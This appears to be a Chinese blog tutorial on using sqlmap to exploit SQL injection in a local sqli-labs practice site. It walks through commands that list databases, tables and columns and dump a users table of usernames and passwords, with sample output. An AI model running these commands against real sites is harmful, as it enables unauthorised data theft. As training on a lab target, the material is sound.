发门网
【web安全】SQL注入漏洞3--sqlmap工具教程
创始人
2024-05-13 00:10:14
0

引言

我们在前面的文章已经介绍了SQL注入的挖掘方法以及渗透利用方法,这篇文章,我们学习一下如何利用工具高效的进行sqlmap 的渗透利用。 我们知道,手工制作payload并渗透利用是最基本的能力,但是这种方式的进展缓慢,不利于在实战中快速高效的扩大战果, 那么,有没有快速利用的工具呢? 答案是有的,前辈们早就开发了许多自动化利用的工具, 今天我们学习一个非常好用的SQL注入工具,sqlmap.

这篇文章主要关注如下内容:

  • 只讲工具的利用思路,不会详细罗列工具的每个命令参数。
  • 以靶场为例来展开对sqlmap的使用介绍。

sqlmap教程

sqlmap的安装

sqlmap的安装还是比较简单的,网上一搜就可以搜到。 在linux操作系统和window操作系统都是可以安装的。

  • 笔者在安装后遇到一个小问题,我是在本地搭建的一个sqli lab靶场,需要通过127.0.0.1本地访问才可以。 但是由于系统的代理问题,在cmd中无法直接访问靶场web页面,这里找到一个临时解决方案,就是代理地址删除掉即可
    笔者使用的windows环境下的解决方案:
    cmd中执行下面命令
set http_proxy=
set https_proxy=

sqlmap的使用

有了自动化工具,就方便了许多, 我们不需要再一个一个手工的构造payload 然后尝试在参数中添加符号进行测试;我们只需要在工具中输入一个url,sqlmap就可以自动识别url中的参数并构造payload探测。

  • 例如, 我们在靶场中的url 为:
    http://127.0.0.1/Less-1/?id=1

我们可以执行如下命令进行探测:

sqlmap.py -u http://127.0.0.1/Less-1/?id=1如果有漏洞,则sqlmap会显示存在漏洞的具体参数。若有多个参数,可以按回车键依次进行sql注入漏洞的测试。
  • 获取当前用户下的所有数据库:
sqlmap.py -u http://127.0.0.1/Less-1/?id=1 --dbs结果如下: 
available databases [7]:
[*] challenges
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] sys
  • 探测数据库中有几个表
python sqlmap.py -u http://127.0.0.1:81/Less-1?id=1 -D security --tables
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+
  • 探测表中有哪些字段
python sqlmap.py -u http://127.0.0.1:81/Less-1?id=1 -D security -T users --columns
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
  • 把表的内容输出出来
python sqlmap.py -u http://127.0.0.1:81/Less-1?id=1 -D security -T users -C id,password,username --dump
+----+------------+----------+
| id | p  word    | name |
+----+------------+----------+
| 1  | Dumb       | Dumb     |
| 2  | I-kill-you | Angelina |

总结

这篇文章,我们学习了sqlmap工具的使用思路。了解了这些基本的使用方法,后续就知道我们怎么自动化进行sql注入漏洞了。 当然,sqlmap的各种高级用法还有很多,本文没有全面讲解所有的命令, 我们在学习或者实战的过程中, 只要有一个明确的思路,然后需要到什么知识点,网上搜索查询并慢慢积累便可。 后续会在演练或者实战过程中不断提升自身能力。

参考资料:
https://blog.csdn.net/weixin_59679023/article/details/123503849
https://zhuanlan.zhihu.com/p/394955217
https://github.com/sqlmapproject/sqlmap

词库加载错误:未能找到文件“E:\highferrum_mysql\Configuration\Dict_Stopwords.txt”。

上一篇:Elasticsearch:关于在 Python 中使用 Elasticsearch 你需要知道的一切 - 8.x

下一篇:夜深忽梦少年事,7年又一年,来看看95年那个小伙现在怎么样了

相关内容

热门资讯

监控摄像头接入GB28181平... 流程简介将监控摄像头的视频在网站和APP中直播,要解决的几个问题是:1&...
Windows10添加群晖磁盘... 在使用群晖NAS时,我们需要通过本地映射的方式把NAS映射成本地的一块磁盘使用。 通过...
protocol buffer... 目录 目录 什么是protocol buffer 1.protobuf 1.1安装  1.2使用...
在Word、WPS中插入AxM... 引言 我最近需要写一些文章,在排版时发现AxMath插入的公式竟然会导致行间距异常&#...
【PdgCntEditor】解... 一、问题背景 大部分的图书对应的PDF,目录中的页码并非PDF中直接索引的页码...
Fluent中创建监测点 1 概述某些仿真问题,需要创建监测点,用于获取空间定点的数据࿰...
educoder数据结构与算法...                                                   ...
MySQL下载和安装(Wind... 前言:刚换了一台电脑,里面所有东西都需要重新配置,习惯了所...
修复 爱普生 EPSON L4... L4151 L4153 L4156 L4158 L4163 L4165 L4166 L4168 L4...
MFC文件操作  MFC提供了一个文件操作的基类CFile,这个类提供了一个没有缓存的二进制格式的磁盘...